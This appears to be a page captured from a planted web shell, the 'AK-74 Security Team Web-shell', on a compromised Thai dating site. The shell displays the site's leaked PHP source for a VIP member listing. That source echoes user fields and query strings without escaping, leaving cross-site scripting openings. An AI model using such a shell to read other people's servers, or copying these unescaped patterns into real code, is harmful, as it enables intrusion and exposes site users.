.:: :[ AK-74 Security Team Web-shell ]: ::.
phpinfo()
PHP
<?php include("include/config.php"); include("include/connect.php"); $startFunctionDefault = 'no'; include("include/function.php"); $counter = $counter_mgt = 0; $sql = " SELECT member.member_id AS member_id, username, image, camera, gender, post_date, image, gender, age, email, province, message, hi5_link, facebook_link, room, bb_pin, line_id, instagram, alarm_status, like_qty, gallery_enable, gallery_image FROM member INNER JOIN member_post ON member.member_id = member_post.member_id AND member.active_status = 1 INNER JOIN vip ON member.member_id = vip.member_id AND vip.start_date <= '".@date("Y-m-d")."' AND vip.stop_date >= '".@date("Y-m-d")."' ORDER BY RAND() LIMIT 0, " . ($configShowPostListRecord+1); $query = sql_query($sql); $allRow = sql_num_rows($query); if ($allRow > 0) { if ( !isset($_SESSION['s_a_list_member_like']) ) { $a_list_member_like = getListModelLike(); $_SESSION['s_a_list_member_like'] = $a_list_member_like; } // end if ( !isset($_SESSION['s_a_list_member_like']) ) { $showDetail = 0; // Don't Show Name Of Member List For Like Model (0, 1) $a_list_member_like = $_SESSION['s_a_list_member_like']; $mktime = mktime(0,0,0,date("m"),(date("d")-1),date("Y")); $yesterday = date("Y-m-d",$mktime); ?> <table width="100%" border="0" cellspacing="0" cellpadding="0" class="search-table"> <tr> <td width="91%" style="font-size:18px; font-weight:bold; text-align:center;">สมาชิกที่มี Gallery</td> <td width="9%" align="center"><a href="/<?php echo $configMyFileFirstPage?>?view-gallery=1" style="color:#FFFFFF">View All</a></td> </tr> </table> <table width="850" border="0" cellpadding="0" cellspacing="0" style="padding:5px 0 20px 0;"> <tr> <!--<th width="3%" align="center" class="postlistFieldTh"><img src="images/b-online.jpg" alt="Online" width="25" height="39" /> <img src="images/msn-gay.gif" width="2" height="1" /></th>--> <th width="35" class="postlistFieldTh" align="center"><img src="/images/bar-p-time.gif" alt="เวลา" width="35" height="39" /></th> <th width="51" class="postlistFieldTh" align="center"><img src="/images/bar-p-pic.gif" alt="รูป" width="25" height="39" /></th> <th width="61" class="postlistFieldTh" align="center"><img src="/images/bar-p-sex.gif" alt="เพศ" width="32" height="39" /></th> <th width="33" class="postlistFieldTh" align="center"><img src="/images/bar-p-age.gif" alt="อายุ" width="33" height="39" /></th> <th width="156" class="postlistFieldTh" align="center"><img src="/images/bar-p-connect.jpg" alt="การติดต่อ" width="70" height="39" /></th> <th width="53" class="postlistFieldTh" align="center"><img src="/images/bar-p-prov.gif" alt="จังหวัด" width="53" height="39" /></th> <th width="423" class="postlistFieldTh" align="center"><img src="/images/bar-p-text.gif" alt="ข้อความ" width="62" height="39" /></th> <th width="38" align="center" class="postlistFieldThEnd"><img src="/images/b-like.jpg" alt="Like" width="38" height="39"></th> </tr> <?php while ($rec = sql_fetch_array($query)) { $counter++; if ($counter > $configShowPostListRecord) break; $indexGender = $rec['gender']; $className = $a_gender_style["$indexGender"]; ?> <tr> <!--<td align="center" class="postlistField"> </td>--> <td align="center" nowrap="nowrap" class="<?php echo $className?>"><?php if ( preg_match('/' . @date("Y-m-d") . '/', $rec['post_date']) ) { echo substr($rec['post_date'],11,5); } elseif ( preg_match('/' . $yesterday . '/', $rec['post_date']) ) { echo substr($rec['post_date'],11,5)."<br />เมื่อวาน"; } else { list($myYear, $myMonth, $myDate) = explode('-', substr($rec['post_date'],0,10)); echo substr($rec['post_date'],11,5)."<br />".$myDate.'/'.$myMonth.'/'.substr($myYear,-2); } // end if ?></td> <td align="center" class="<?php echo $className?>"><a href="/ladyboy/<?php echo $rec['username']?>" target="_blank"><?php $imagePath = 'uploads/memberPost/'.$rec['image']; $alt = ($indexGender == 'ไม่ระบุ')?'เกย์':$indexGender; $alt .= ', Gay, หาเพื่อนเกย์'; if ( ($rec['image'] <> '') && (file_exists($imagePath)) ) { $aSize = getimagesize($imagePath); if ($aSize[0] > $configMemberPostWidth) $aSize[0] = $configMemberPostWidth; if ($aSize[1] > $configMemberPostHeight) $aSize[1] = $configMemberPostHeight; if ($aSize[0] == '') $aSize[0] = $configMemberPostWidth; if ($aSize[1] == '') $aSize[1] = $configMemberPostHeight; echo '<img src="/'.$imagePath.'" width="'.$aSize[0].'" height="'.$aSize[1].'" border="0" title="'.$alt.'" alt="'.$alt.'">'; } else { // end if ( ($rec['image'] <> '') && (file_exists($imagePath)) ) { if (trim($rec['facebook_link']) == '') { echo '<img src="'.$a_gender_icon["$indexGender"].'" width="60" height="60" border="0" title="'.$alt.'" alt="'.$alt.'">'; } else { // end if (trim($rec['facebook_link']) == '') { if (preg_match('/id=/i', $rec['facebook_link'])) { $aData = explode('id=', $rec['facebook_link']); echo '<img src="https://graph.facebook.com/'.end($aData).'/picture" border="0" title="'.$alt.'" alt="'.$alt.'">'; } elseif (preg_match('/\//', $rec['facebook_link'])) { // end if (preg_match('/?id=/i', $rec['facebook_link'])) { $aData = explode('/', $rec['facebook_link']); echo '<img src="https://graph.facebook.com/'.end($aData).'/picture" border="0" title="'.$alt.'" alt="'.$alt.'">'; } else { // end elseif (preg_match('/\//', $rec['facebook_link'])) { echo '<img src="'.$a_gender_icon["$indexGender"].'" width="60" height="60" border="0" title="'.$alt.'" alt="'.$alt.'">'; } } // if (trim($rec['facebook_link']) == '') { } // if ( ($rec['image'] <> '') && (file_exists($imagePath)) ) { ?></a><?php if ($rec['gallery_enable'] == 1) { ?><div id="galleryVIP-<?php echo $rec['member_id']?>" class="gallery-group"><?php $a_img = array(); $a_img = explode('::', $rec['gallery_image']); $countImgGallery = 0; foreach ($a_img as $img) { if ($img == '') continue; ?><a href="/uploads/gallery_image/full/<?php echo $img?>"<?php if (++$countImgGallery > 1) echo ' style="display:none"'; ?> title="<?php echo $rec['username']?>"><img src="/images/gallery-view.png" style="border:0; padding:3px 0 3px 0;"></a><?php //echo $countImgGallery; } // end foreach ($a_img as $img) { ?></div> <script type="text/javascript"> $(function() { $('#galleryVIP-<?php echo $rec['member_id']?> a').lightBox(); }); </script> <?php } // end if ($rec['gallery_enable'] == 1) { ?></td> <td align="center" class="<?php echo $className?>"><a href="/ladyboy/<?php echo $rec['username']?>" target="_blank" title="<?php echo $alt?>" style="text-decoration:none; color:#000000;"><?php echo $rec['gender']?></a></td> <td align="center" class="<?php echo $className?>"><?php echo $rec['age']?></td> <td align="center" valign="top" class="<?php echo $className?>"> <div class="social-icon"> <?php $social_count = 0; $social_text = ''; if ($rec['camera'] == 1) { $social_text .= '<img src="/images/social-icon/cam.gif" width="25" height="25" title="มีกล้อง" alt="มีกล้อง" align="absmiddle">'; if (++$social_count % $configPostlistConnectColum == 0) $social_text .= '<br>'; } // end if ($rec['camera'] == 1) { $social_text .= '<img src="/images/social-icon/msn.png" align="absmiddle" style="border:none; cursor:pointer;" onclick="showColorBoxMessage(\'' . addslashes($rec['email']) . '\')">'; if (++$social_count % $configPostlistConnectColum == 0) $social_text .= '<br>'; if ( $rec['room'] == '1' ) { $social_text .= '<img src="/images/social-icon/show-home.gif" border="0" width="25" height="25" title="มีห้อง" alt="มีห้อง" align="absmiddle">'; if (++$social_count % $configPostlistConnectColum == 0) $social_text .= '<br>'; } // end if ( $rec['room'] == '1' ) { if ( ($rec['facebook_link'] <> '') && (preg_match('/facebook.com/i',$rec['facebook_link'])) ) { $social_text .= '<a href="redirectLink.php?l='.urldecode($rec['facebook_link']).'" target="_blank"><img src="/images/social-icon/show-fb.gif" width="25" height="25" title="มี FaceBook" alt="มี FaceBook" align="absmiddle" border="0"></a>'; if (++$social_count % $configPostlistConnectColum == 0) $social_text .= '<br>'; } // end if ( ($rec['facebook_link'] <> '') && (preg_match('/facebook.com/i',$rec['facebook_link'])) ) { if ( $rec['instagram'] <> '' ) { $social_text .= '<img src="/images/social-icon/icon-instagram.gif" width="25" height="25" title="มี Instagram" alt="มี Instagram" border="0" onclick="showColorBoxMessage(\'Instagram : ' . addslashes($rec['instagram']) . '\')" align="absmiddle" style="cursor:pointer">'; if (++$social_count % $configPostlistConnectColum == 0) $social_text .= '<br>'; } // end if ( $rec['instagram'] <> '' ) { if ( $rec['line_id'] <> '' ) { $social_text .= '<img src="/images/social-icon/icon-line.gif" width="25" height="25" title="มี Line" alt="มี Line" border="0" onclick="showColorBoxMessage(\'Line Id : ' . addslashes($rec['line_id']) . '\')" align="absmiddle" style="cursor:pointer">'; if (++$social_count % $configPostlistConnectColum == 0) $social_text .= '<br>'; } // end if ( $rec['line_id'] <> '' ) { if ( $rec['bb_pin'] <> '' ) { $social_text .= '<img src="/images/social-icon/show-bb.gif" width="25" height="25" title="มี BB Pin" alt="มี BB Pin" border="0" onclick="showColorBoxMessage(\'BB Pin : ' . addslashes($rec['bb_pin']) . '\')" align="absmiddle" style="cursor:pointer">'; if (++$social_count % $configPostlistConnectColum == 0) $social_text .= '<br>'; } // end if ( $rec['bb_pin'] <> '' ) { if ( ($rec['hi5_link'] <> '') && (preg_match('/hi5.com/i',$rec['hi5_link'])) ) { $social_text .= '<a href="redirectLink.php?l='.urldecode($rec['hi5_link']).'" target="_blank"><img src="/images/social-icon/show-hi5.gif" width="25" height="25" title="มี Hi5" alt="มี Hi5" border="0" align="absmiddle"></a>'; if (++$social_count % $configPostlistConnectColum == 0) $social_text .= '<br>'; } // end if ( ($rec['hi5_link'] <> '') && (preg_match('/hi5.com/i',$rec['hi5_link'])) ) { //$check = false; //if (@in_array($rec['member_id'], $a_member_VIP)) $check = true; /*if ($check) { $social_text .= '<img src="/images/vip.gif" alt="VIP" width="35" height="20" border="0" align="absmiddle" title="VIP">'; if (++$social_count % $configPostlistConnectColum == 0) $social_text .= '<br>'; } // end if ($check) {*/ echo ($social_text == '') ? ' ' : $social_text; ?></div><?php /*// เช็คว่าเป็น VIP หรือไม่ หากเป็นจะมีรูป Tab VIP $check = false; //if (count($a_vip_tag) > 0) { //foreach ($a_vip_tag as $value) { //if (checkVipTag($rec['member_id'], $value)) { //$check = true; //break; //} // end if //} // end foreach //} // end if (count($a_vip_tag) > 0) { if (@in_array($rec['member_id'], $a_member_VIP)) $check = true; if ($check) { ?> <img src="/images/vip.gif" alt="VIP" width="35" height="20" border="0" align="absmiddle" title="VIP"> <?php }*/ /*?><a href="msnim:add?contact=<?php echo $rec['email']?>"><?php $i = 0; while (1) { $i++; $text = mb_substr($rec['email'], ($i - 1)*$configMaxLanghtEmailWap, $configMaxLanghtEmailWap,'utf8'); if (trim($text) == '') break; echo $text."<br />"; } // end while (1) { ?></a>*/?></td> <td width="55" align="center" class="<?php echo $className?>"><?php echo $rec['province']?></td> <td align="center" class="<?php echo $className?>"><span onmouseover="this.style.cursor='pointer'" onclick="showColorBoxMessage('<?php echo addslashes($rec['email'])?>')"><?php if ($rec['alarm_status'] == 0) { if (@in_array($indexGender, $a_gender_extra)) { echo scanInvectiveExtra($rec['message'],'** '); } else { if ($check) echo scanInvectiveExtra($rec['message'],'** '); else echo scanInvective($rec['message'],'** '); } // end if (@in_array($indexGender, $a_gender_extra)) { } else { // end if ($rec['alarm_status'] == 0) { echo str_replace('##', $a_gender_word["$indexGender"], $configTextPostAlarm); } // end if ?></span><?php if ($admin == 1) { // กรณีที่เป็น Admin จะสามารถแจ้งเตือนรูปภาพและข้อความได้ ?> <br /><input type="button" name="buttonImage_<?php echo $rec["member_id"]?>" id="buttonImage_<?php echo $rec["member_id"]?>" value="เตือนรูป" onclick="if( confirm('ต้องการเตือนรูปภาพของ Email : <?php echo $rec['email']?> หรือไม่ ?\n\nหากแจ้งเตือนรูปภาพของ Email นี้จะแสดงรูปภาพเป็นรูป Default') ) { window.location='/getQueryBan.php?action=alarmImage&member_id=<?php echo $rec["member_id"]?>&selectRow=<?php echo $counter_mgt?>&frompage=<?php echo $_SERVER['PHP_SELF']?><?php if ($_SERVER['QUERY_STRING'] <> '') echo '&'.$_SERVER['QUERY_STRING']; ?>'; }" /> <input type="button" name="buttonMessage_<?php echo $rec["member_id"]?>" id="buttonMessage_<?php echo $rec["member_id"]?>" value="เตือนข้อความ" onclick="if( confirm('ต้องการเตือน Email : <?php echo $rec['email']?> หรือไม่ ?\n\nหากแจ้งเตือนข้อความของ Email นี้จะแสดงเป็นค่า Default ที่ระบบตั้งไว้') ) { window.location='/getQueryBan.php?action=alarm&member_id=<?php echo $rec["member_id"]?>&selectRow=<?php echo $counter_mgt?>&frompage=<?php echo $_SERVER['PHP_SELF']?><?php if ($_SERVER['QUERY_STRING'] <> '') echo '&'.$_SERVER['QUERY_STRING']; ?>'; }" /> <img src="/images/rotate.jpg" width="20" title="แจ้งเตือนการโพสต์ในเชิงโฆษณา" alt="แจ้งเตือนการโพสต์ในเชิงโฆษณา" style="cursor:pointer" onclick="if( confirm('ต้องการแจ้งเตือนการโพสต์ข้อความของ Email : <?php echo $rec['email']?> หรือไม่ ') ) { window.location='/getQueryBan.php?action=swapSection&member_id=<?php echo $rec["member_id"]?>&selectRow=<?php echo $counter_mgt?>&frompage=<?php echo $_SERVER['PHP_SELF']?><?php if ($_SERVER['QUERY_STRING'] <> '') echo '&'.$_SERVER['QUERY_STRING']; ?>'; }" /> <?php } // end if ($admin == 1) { ?></td> <td align="left" valign="top" nowrap="nowrap" class="<?php echo $className?>"><?php $like_action = ( @in_array($rec["member_id"], $a_list_member_like) ) ? 0 : 1; echo createLikeTab('create', $rec["member_id"], $like_action, $rec['like_qty'], $showDetail); ?></td> </tr> <?php } // end while ?> </table><?php } // end if ($allRow > 0) { ?>::::::continue
Rename:
-